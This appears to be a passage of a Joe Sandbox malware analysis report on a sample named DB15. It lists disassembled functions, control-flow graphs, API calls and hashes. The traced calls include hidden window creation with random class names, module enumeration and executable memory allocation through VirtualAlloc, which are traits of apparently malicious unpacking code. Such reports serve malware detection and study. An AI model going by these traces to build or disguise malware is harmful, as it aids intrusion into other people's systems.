                                                                                                                                                                                                                                        • Instruction ID: 31fb44aa0bb03ab45e5de445d38d54a259b14e511f7535b6c177b28a2c1f5c12
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62B1B674A00208AFDB44CF98C895F9EBBB5BF88314F248158E509AB391D771AE41CF94
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02870420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 15 2870420-28704f8 17 28704ff-287053c CreateWindowExA 15->17 18 28704fa 15->18 20 2870540-2870558 PostMessageA 17->20 21 287053e 17->21 19 28705aa-28705ad 18->19 22 287055f-2870563 20->22 21->19 22->19 23 2870565-2870579 22->23 23->19 25 287057b-2870582 23->25 26 2870584-2870588 25->26 27 28705a8 25->27 26->27 28 287058a-2870591 26->28 27->22 28->27 29 2870593-2870597 call 2870110 28->29 31 287059c-28705a5 29->31 31->27
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02870533
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                                                                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                                                        • API String ID: 716092398-2341455598
                                                                                                                                                                                                                                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                        • Instruction ID: ff9dc8a76bb6354d6357193358a9766552110ade507663639ee1671ae2554456
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D511A74D08388DEEB11CBD8C849BDDBFB26F11708F144058D5487F286C3BA9658CBA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028705B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 32 28705b0-28705d5 33 28705dc-28705e0 32->33 34 28705e2-28705f5 GetFileAttributesA 33->34 35 287061e-2870621 33->35 36 28705f7-28705fe 34->36 37 2870613-287061c 34->37 36->37 38 2870600-287060b call 2870420 36->38 37->33 40 2870610 38->40 40->37
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 028705EC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID: apfHQ$o
                                                                                                                                                                                                                                        • API String ID: 3188754299-2999369273
                                                                                                                                                                                                                                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                        • Instruction ID: d8b7be7265b8a68bc02ff7e265d304961fe6c3efa539bff228921eb53e5c6b30
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB011E74C0425CEADB10DBD8C5583AEBFB5AF41309F148099C4096B242D7769B98CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 027D67C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 41 27d67c6-27d67df 42 27d67e1-27d67e3 41->42 43 27d67ea-27d67f6 CreateToolhelp32Snapshot 42->43 44 27d67e5 42->44 45 27d67f8-27d67fe 43->45 46 27d6806-27d6813 Module32First 43->46 44->43 45->46 53 27d6800-27d6804 45->53 47 27d681c-27d6824 46->47 48 27d6815-27d6816 call 27d6485 46->48 51 27d681b 48->51 51->47 53->42 53->46
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 027D67EE
                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 027D680E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845428957.00000000027D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 027D6000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_27d6000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction ID: a13c15e189b645808ccfa031c56c700c8635b39a72c9f2f58af94cd4a9ec60e2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34F090366407156FD7203FF9B88EB6E76FCAF89629F100628E643A10C1DB74E8458A61
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 027D6485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 54 27d6485-27d64bf call 27d6798 57 27d650d 54->57 58 27d64c1-27d64f4 VirtualAlloc call 27d6512 54->58 57->57 60 27d64f9-27d650b 58->60 60->57
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 027D64D6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845428957.00000000027D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 027D6000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_27d6000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction ID: 122b4c222af8e0e0545f5113ea185e8873838ddb58c100f26560a8d846caaf03
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90113C79A00208EFDB01DF98C985E99BBF5AF08350F058094FA489B361D375EA90DF90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 02896437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 551 2896437-2896440 552 2896442-2896446 551->552 553 2896466 551->553 552->553 554 2896448-2896459 call 2899636 552->554 555 2896468-289646b 553->555 558 289645b-2896460 call 2895ba8 554->558 559 289646c-289647d call 2899636 554->559 558->553 564 2896488-289649a call 2899636 559->564 565 289647f-2896480 call 289158d 559->565 570 28964ac-28964cd call 2895f4c call 2896837 564->570 571 289649c-28964aa call 289158d * 2 564->571 568 2896485-2896486 565->568 568->558 580 28964cf-28964dd call 289557d 570->580 581 28964e2-2896500 call 289158d call 2894edc call 2894d82 call 289158d 570->581 571->568 586 28964df 580->586 587 2896502-2896505 580->587 590 2896507-2896509 581->590 586->581 587->590 590->555
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1442030790-0
                                                                                                                                                                                                                                        • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                                                                                                        • Instruction ID: 40abeb5e041a96e4438a0cc609fad69622de90079a6bba804a10d5eff57a02fc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F21A13D108621AFEF227FA9D805E0B7BEADF42764B588029F45DD54A4FB228550CF52
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02893F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 595 2893f16-2893f2f 596 2893f49-2893f5e call 289bdc0 595->596 597 2893f31-2893f3b call 2895ba8 call 2894c72 595->597 596->597 603 2893f60-2893f63 596->603 604 2893f40 597->604 605 2893f65 603->605 606 2893f77-2893f7d 603->606 611 2893f42-2893f48 604->611 607 2893f6b-2893f75 call 2895ba8 605->607 608 2893f67-2893f69 605->608 609 2893f89-2893f9a call 28a0504 call 28a01a3 606->609 610 2893f7f 606->610 607->604 608->606 608->607 619 2893fa0-2893fac call 28a01cd 609->619 620 2894185-289418f call 2894c9d 609->620 610->607 613 2893f81-2893f87 610->613 613->607 613->609 619->620 625 2893fb2-2893fbe call 28a01f7 619->625 625->620 628 2893fc4-2893fcb 625->628 629 289403b-2894046 call 28a02d9 628->629 630 2893fcd 628->630 629->611 636 289404c-289404f 629->636 632 2893fcf-2893fd5 630->632 633 2893fd7-2893ff3 call 28a02d9 630->633 632->629 632->633 633->611 640 2893ff9-2893ffc 633->640 638 289407e-289408b 636->638 639 2894051-289405a call 28a0554 636->639 642 289408d-289409c call 28a0f40 638->642 639->638 648 289405c-289407c 639->648 643 289413e-2894140 640->643 644 2894002-289400b call 28a0554 640->644 651 28940a9-28940d0 call 28a0e90 call 28a0f40 642->651 652 289409e-28940a6 642->652 643->611 644->643 653 2894011-2894029 call 28a02d9 644->653 648->642 661 28940de-2894105 call 28a0e90 call 28a0f40 651->661 662 28940d2-28940db 651->662 652->651 653->611 659 289402f-2894036 653->659 659->643 667 2894113-2894122 call 28a0e90 661->667 668 2894107-2894110 661->668 662->661 671 289414f-2894168 667->671 672 2894124 667->672 668->667 673 289413b 671->673 674 289416a-2894183 671->674 675 289412a-2894138 672->675 676 2894126-2894128 672->676 673->643 674->643 675->673 676->675 677 2894145-2894147 676->677 677->643 678 2894149 677->678 678->671 679 289414b-289414d 678->679 679->643 679->671
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 02893F51
                                                                                                                                                                                                                                          • Part of subcall function 02895BA8: __getptd_noexit.LIBCMT ref: 02895BA8
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 02893FEA
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 02894020
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0289403D
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 02894093
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 028940AF
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 028940C6
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 028940E4
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 028940FB
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02894119
                                                                                                                                                                                                                                        • __invoke_watson.LIBCMT ref: 0289418A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                                                        • Instruction ID: a52f569e48cd6b0385b3cea2af678bfb61054e08d90a72eedc1c4ac1a27c1e5c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7071E77DA00B16ABEF149E7DCC40B6AB3F9AF10364F184279E518E7680EB70D9418F91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0289650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3432600739-0
                                                                                                                                                                                                                                        • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                                                                                                        • Instruction ID: 59f3fac2eee7d77ce58e2fc3885cdd2181bbc178962b338d609c11275e216455
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF41363E904319AFDF01AFA8DC40B9E3BEAEF44324F18802DE908D6191EB759545DF12
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028984AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 744 28984ab-28984d9 call 2898477 749 28984db-28984de 744->749 750 28984f3-289850b call 289158d 744->750 751 28984ed 749->751 752 28984e0-28984eb call 289158d 749->752 756 289850d-289850f 750->756 757 2898524-289855a call 289158d * 3 750->757 751->750 752->749 752->751 759 289851e 756->759 760 2898511-289851c call 289158d 756->760 769 289856b-289857e 757->769 770 289855c-2898562 757->770 759->757 760->756 760->759 775 289858d-2898594 769->775 776 2898580-2898587 call 289158d 769->776 770->769 771 2898564-289856a call 289158d 770->771 771->769 778 28985a3-28985ae 775->778 779 2898596-289859d call 289158d 775->779 776->775 782 28985cb-28985cd 778->782 783 28985b0-28985bc 778->783 779->778 783->782 785 28985be-28985c5 call 289158d 783->785 785->782
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ExitProcess___crt
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1022109855-0
                                                                                                                                                                                                                                        • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                                                                                                                        • Instruction ID: 0827208d640255e701aaae51b0d4ea6edb559b3449b2696f87b9d93134fe11f9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331E53D900252DFCF215F18FC8484977A6FB1632430D866AE91DD72B0CBB459C8AF91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028BFC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 028BFC1F
                                                                                                                                                                                                                                          • Part of subcall function 028A169C: std::exception::_Copy_str.LIBCMT ref: 028A16B5
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFC34
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 028BFC4D
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFC62
                                                                                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 028BFC74
                                                                                                                                                                                                                                          • Part of subcall function 028BF914: std::exception::exception.LIBCMT ref: 028BF92E
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFC82
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 028BFC9B
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFCB0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                                                                                                                                                        • String ID: leM
                                                                                                                                                                                                                                        • API String ID: 3569886845-2926266777
                                                                                                                                                                                                                                        • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                                                        • Instruction ID: 8f1cfdad14c02755525b698a89a28c3dbe909e9a5709fd0ea9c2c21f7a4876f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0011BC7DC0020DBBCF00FFA9D869CDEBB7DAA04344F408566AD2897641EB74A3488F95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3721157643-0
                                                                                                                                                                                                                                        • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                                                                                                        • Instruction ID: 9ba123abdf7040d210661453053c40f95679e40c1fc7600bac7e179da5ac9fd3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B61127BE9045503ACA61B3BA0C15EFF3ADD9F45701F0C00A9FF5DE1180DB189A049BB2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02881960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 65388428-0
                                                                                                                                                                                                                                        • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                                                                                                        • Instruction ID: 6f7b1195b1c9e72fd743cf9a6dc1dc9c9513c04aa5d3aeec90c6f53bf8cc5e93
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC515D79D40209ABDB11EBA5DC89FEFBBB9FF04744F140025F919F6180EB746A018BA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                                                                                                                        • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                                                        • Instruction ID: 98faa5071a5634663cf3f73ecdc789ef1f774b6319b960c02451ac57c18b6497
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F51B0B9D40209ABEF10DFA5DC46FEEBBB8EB14704F140025FA05F6180E774AA058BA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                                                                                                                        • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                                                        • Instruction ID: 6fd8baa8b32251759ff68e88edfef2c1a518b2db946e1871f61ba7bac6293769
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21518F79D40209ABDF21DFA5DC45FEEBBB8FB04704F140029EA15F6180EB74AA058BA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028B208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3534693527-0
                                                                                                                                                                                                                                        • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
